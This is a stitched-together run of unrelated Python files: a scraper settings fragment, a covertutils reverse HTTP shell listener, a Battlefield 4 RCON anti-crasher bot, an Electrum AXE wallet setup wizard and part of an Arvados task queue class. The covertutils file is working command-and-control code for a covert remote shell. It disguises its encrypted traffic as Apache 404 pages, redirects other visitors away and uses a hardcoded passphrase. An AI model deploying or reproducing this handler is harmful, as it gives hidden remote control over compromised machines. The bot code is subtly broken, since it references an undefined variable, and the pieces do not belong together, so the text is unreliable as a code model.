'SCHEDULER_QUEUE_KEY': 'digholes:queue_ip_pool',
'SCHEDULER_DUPEFILTER_KEY' : 'digholes:dupefilter',
'INPUT_PATH': 'input',
}
# from multiprocessing import Process
# p = Process(target=main, args=(settings,))
# p.start()
# p.join()
main(settings)
|
native.py
|
#!/usr/bin/python3
# Disclaimer!
# This code is not an optimal HTTP reverse shell!
# It is created to introduce as many aspects of 'covertutils' as possible.
# There are muuuuuch better ways to implement a reverse HTTP shell using this package,
# using many Python helpers like SimpleHTTPServer.
# In this file the HTTP requests/responses are crafted in socket level to display
# the concept of 'StegoOrchestrator' class and network wrapper functions
from covertutils.handlers import ResponseOnlyHandler
#from covertutils.orchestration import StegoOrchestrator
from covertutils.orchestration import SimpleOrchestrator
from covertutils.datamanipulation import asciiToHexTemplate
from covertutils.shells.impl import StandardShell, ExtendableShell
from time import sleep
from os import urandom
import random
import string
import sys
import socket
from threading import Thread
#============================== HTTP Steganography part ===================
resp_ascii = '''HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Win32)
Content-Length: 363
Connection: Closed
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body>
<!-- Reference Code: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-->
</html>
'''
resp_templ = asciiToHexTemplate( resp_ascii )
# qa85b923nm90viuz12.securosophy.com
req_ascii = '''GET /search.php?q=~~~~~~~~?userid=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1
Host: {0}
Cookie: SESSIOID=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eTag: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
User-Agent: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
''' # 2 new lines terminate the HTTP Request
req_templ = asciiToHexTemplate( req_ascii )
# Create the StegoOrchestrator configuration string
stego_config = '''
X:_data_:\n\n
resp = """%s"""
req = """%s"""
''' % ( resp_templ, req_templ )
#==========================================================================
#============================== Handler Overriding part ===================
# It is an HTTP Server, so it has to send data only when requested.
# Hence the use of the 'ResponseOnlyHandler' which sends data only when 'onMessage()' is hit with the self.request_data message
class MyHandler ( ResponseOnlyHandler ) : #
# Overriding original onMessage method to send a response in any case - not only 'ResponseOnlyHandler.request_data' message arrives
def onMessage( self, stream, message ) :
# If the Parent Class would respond (the message was a request), don't bother responding
responded = super( MyHandler, self ).onMessage( stream, message )
if not responded : # If the message was real data (not 'ResponseOnlyHandler.request_data' string), the Parent Class didn't respond
self.queueSend("X", 'heartbeat'); # Make it respond anyway with 'X' (see Client)
responded = super( MyHandler, self ).onMessage( stream, message )
assert responded == True # This way we know it responsed!
# The PrintShell class will automatically handle the response (print it to the user)
def onChunk( self, stream, message ) :
if message : return # If this chunk is the last and message is assembled let onMessage() handle it
# print "[*] Got a Chunk"
self.onMessage( 'heartbeat', self.request_data ) # If this is a message chunk, treat it as a 'request_data' message
def onNotRecognised( self ) :
# print "[!]< Unrecognised >"
# If someone that isn't the client sends an HTTP Request
redirection_http='''
HTTP/1.1 302 Found
Server: Apache/2.2.14 (Win32)
Location: http://securosophy.com
Content-Length: 0
Content-Type: text/plain
Content-Language: el-US
Connection: close
''' # The response will be a redirection
send( redirection_http ) #
# This way all random connections will get redirected to "securosophy.com" blog
#==========================================================================
#============================== Networking part =========================
# The networking is handled by Python API. No 'covertutils' code here...
addr = ("0.0.0.0", int( sys.argv[1]) ) # The Listening Address tuple
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Listening socket
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Free the socket object directly after process finishes
server_socket.bind( addr ) # Handling Networking
server_socket.listen(5) # independently of covertutils
# HTTP Servers work like:
# Client (Socket Opens) Server
# Client ------SYN-----> Server
# Client <---SYN-ACK---- Server
# Client ------ACK-----> Server
# Client (HTTP Request) Server
# Client --------------> Server
# Client (HTTP Response) Server
# Client <-------------- Server
# Client (Socket Close) Server
# Client <-----FIN------ Server
# Client ----FIN-ACK---> Server
# Client <-----ACK------ Server
# As this happens for every HTTP Request/Response the 'send' and 'recv' functions
# use spin-locks to block and recognise when they can tranfer data.
# 'send' and 'recv' are wrappers for Handler object networking. Covertutils is network agnostic
client = None # Globally define the client socket
client_addr = None
def recv () :
global client
while not client : continue # Wait until there is a client
ret = ''
while not ret : # Block until all data is received
ret = client.recv( 2048 )
return ret # Return the received data
def send( raw ) :
global client
while not client : continue # Wait until there is a client
client.send( raw ) # Send the data through the socket
client.shutdown(socket.SHUT_RDWR) # Terminate the Socket
#==========================================================================
#=============================Handler Creation============================
passphrase = "App1e5&0raNg3s" # This is used to generate encryption keys
#orch = StegoOrchestrator( passphrase,
# stego_config = stego_config,
# main_template = "resp", # The template to be used
# hex_inject = True, # Inject data in template in hex mode
# streams = ['heartbeat'],
# )
orch = SimpleOrchestrator( passphrase, # Encryption keys generated from the passphrase
tag_length = 2, # The tag length in bytes
out_length = 52, # The absolute output byte length (with tags)
in_length = 52, # The absolute input byte length (with tags)
streams = ['heartbeat'], # Stream 'control' will be automatically added as failsafe mechanism
reverse = True ) # Reverse the encryption channels - Agent has `reverse = False`
handler = MyHandler( recv, send, orch ) # Instantiate the Handler Object using the network wrappers
def serveForever() :
global client
global client_addr
while True : # Make it listen `hard`
client_new, client_addr = server_socket.accept()
client = client_new
server_thread = Thread ( target = serveForever )
server_thread.daemon = True
server_thread.start()
#==========================================================================
#============================== Shell Design part ========================
shell = ExtendableShell( handler,
prompt = "[Sabre] > ",
ignore_messages = set(['X']) # It is also the default argument in BaseShell
)
shell.start()
#==========================================================================
# Magic!
|
app.py
|
########################
# made by ResupinePuma
# for bf4 community
########################
import json, requests, re, random
import socket
from threading import Thread
from bf_anticrasher.frostbite_rcon_utils import *
from bf_anticrasher.config import *
import datetime
class RCon():
def __init__(self, address, password):
self.ip = address[0]
self.port = address[1]
self.password = password
self.connection = None
self.events = {}
self.listener = None
def connect(self):
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.connection.settimeout(1)
self.connection.connect((self.ip, self.port))
self.connection.setblocking(1)
packet_to_send = encode_packet(create_packet(0, False, False, ['login.plainText', password]))
self.connection.send(packet_to_send)
data_buffer = bytes()
while not contains_complete_packet(data_buffer):
data_buffer += self.connection.recv(2048)
packet_to_send = encode_packet(create_packet(0, False, False, ['admin.eventsEnabled', 'True']))
self.connection.send(packet_to_send)
data_buffer = bytes()
while not contains_complete_packet(data_buffer):
data_buffer += self.connection.recv(2048)
packet = decode_packet(data_buffer)
#print(packet)
if b"OK" in packet['words']:
return True
else:
raise Exception(packet['words'][0].decode("utf-8"))
except Exception as ex:
raise ex
def Command(self, command:str):
packet_to_send = encode_packet(create_packet(0, False, False, command.split(" ")))
self.connection.send(packet_to_send)
data_buffer = bytes()
while not contains_complete_packet(data_buffer):
data_buffer += self.connection.recv(2048)
packet = decode_packet(data_buffer)
return [w.decode("utf-8") for w in packet['words'] if not type(w) == int]
def __DecodeEvent(self, event):
event['words'] = [w.decode("utf-8") for w in event['words'] if not type(w) == int]
event = event['words']
if event[0] in self.events.keys():
funk = self.events[event[0]]
event.pop(0)
funk(event)
def StartEventListener(self):
def listen():
while True:
data_buffer = bytes()
while not contains_complete_packet(data_buffer):
# if b'punkBuster' in self.connection.recv(2048):
# continue
#print(self.connection.recv(2048))
data_buffer += self.connection.recv(16384)
packet = decode_packet(data_buffer)
Thread(target=self.__DecodeEvent, args=[packet]).start()
#self.__DecodeEvent(packet['words'])
self.listener = Thread(name="Listener", target=listen)
self.listener.start()
def CloseConnection(self):
self.listener._delete()
self.connection.close()
class Session(requests.Session):
def __init__(self, **kwargs):
self._proxylist = self.gen_proxylist()
super().__init__(**kwargs)
self.proxies.update(random.choice(self._proxylist))
def gen_proxylist(self):
#text = requests.get("https://spys.me/proxy.txt").text.replace("\n","=")
#return [{"http" : f"http://{u}", "https" : f"http://{u}"} for u in re.findall(r"=([0-9.:]+)", text)]
return [{"http" : None, "https" : None}]
def request(self, method, url, **kwargs):
while True:
try:
response = super().request(method, url, **kwargs)
if response.status_code == 200:
return response
else:
raise Exception()
except Exception as ex:
print(ex)
self._proxylist.remove(self.proxies)
if len(self._proxylist) == 0:
self._proxylist = self.gen_proxylist()
self.proxies.update(random.choice(self._proxylist))
raise Exception("Retries limit exceeded")
session = Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/68.0",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Connection":"keep-alive",
"Upgrade-Insecure-Requests": "1"
})
def GetUserInfo(username, debug=False):
"""
Returns
---------
personaId : int
id of person
good : bool
good or bad user
username : str
username
"""
res = session.post(url=f"https://battlelog.battlefield.com/{bf}/search/query/", data=f"query={username}").json()
#a = json.loads(res.text)
personaId = [d["personaId"] for d in res.get('data', []) if d.get('personaName', "") == username][-1]
if not personaId:
return Exception("User not found")
else:
personaId = int(personaId)
bflist = {
"4" : f"https://battlelog.battlefield.com/bf4/warsawoverviewpopulate/{personaId}/1/",
"3" : f"https://battlelog.battlefield.com/bf3/overviewPopulateStats/{personaId}/None/1/"
}
url = bflist[re.findall(r"([34])", bf)[0]]
res = session.get(url).json()
if res["data"].get("overviewStats"):
stats = res["data"]["overviewStats"]
try:
for d in stats.values():
if type(d) == int:
if not (d < 2147483647 or d > -2147483647) or debug:
raise ValueError("Bad person")
except ValueError:
return personaId, False, username
else:
return personaId, True, username
return personaId, True, username
def CheckParams(guid, *args):
if (args[1] == False):
print(f"{args[2]} banned " + str(rcon.Command(f"banList.add guid {guid} perm Crasher({player[2]} {player[0]})")))
f = open("ban.log", "w")
f.write(f"{str(datetime.datetime.now())} | {guid} | {args[0]} | {args[2]}\n")
f.close()
else:
print(f"{args[2]} joined")
def OnJoin(event):
try:
username, guid = event[0], event[1]
personaId, status, username = GetUserInfo(username)
CheckParams(guid, personaId, status, username)
except Exception as ex:
print(str(ex) + " " + str(event))
if __name__ == "__main__":
print("i'm alive")
rcon = RCon((ip,port), password)
rcon.connect()
rcon.events.update({"player.onJoin" : OnJoin})
rcon.StartEventListener()
while True:
pass
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_axe.wallet import Wallet
from electrum_axe.storage import WalletStorage
from electrum_axe.util import UserCancelled, InvalidPassword
from electrum_axe.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_axe.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:XERBBcaPf5D5... \t-> XhGqfhnL...\n')
# note: full key is XERBBcaPf5D5oFXTEP7TdPWLem5ktc2Zr3AhhQhHVQaF49fDP6tN
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(4, 4, self.size-8, self.size-8)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 8, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, plugins, storage)
QDialog.__init__(self, None)
self.setWindowTitle('AXE Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-axe.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('AXE Electrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
return
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since AXE Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
action = self.storage.get_action()
if action and action not in ('new', 'upgrade_storage'):
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("AXE Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let AXE Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
task_queue.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
"""TaskQueue."""
import queue
import threading
from typing import Callable, Optional
from .loghandler import _logger
class TaskQueue:
"""A TaskQueue class.
Uses a first-in, first-out queue of tasks executed on a fixed number of
threads.
New tasks enter the queue and are started in the order received,
as worker threads become available.
If thread_count == 0 then tasks will be synchronously executed
when add() is called (this makes the actual task queue behavior a
no-op, but may be a useful configuration knob).
The thread_count is also used as the maximum size of the queue.
The threads are created during TaskQueue initialization. Call
join() when you're done with the TaskQueue and want the threads to
stop.
"""
in_flight: int = 0
"""The number of tasks in the queue."""
def __init__(self, lock: threading.Lock, thread_count: int):
"""Create a new task queue using the specified lock and number of threads."""
self.thread_count = thread_count
self.task_queue: queue.Queue[Optional[Callable[[], None]]] = queue.Queue(
maxsize=self.thread_count
)
self.task_queue_threads = []
self.lock = lock
self.error: Optional[BaseException] = None
